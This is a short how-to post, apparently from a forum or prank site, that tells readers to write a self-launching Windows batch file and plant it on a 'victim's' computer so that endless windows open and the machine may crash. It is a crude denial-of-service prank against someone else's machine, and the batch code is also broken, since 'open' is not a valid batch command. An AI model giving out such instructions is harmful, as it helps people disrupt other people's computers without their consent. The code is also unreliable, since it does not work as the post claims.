Here's how you can create a program to open an infinite number of windows, overloading the victim's pc! Simply create a batch file and put this code in:
@ECHO OFF
open {batch file name}
PAUSE
Put it on the victim's computer and watch as his/her computer gets overloaded with windows (and possibly even crashes!)!
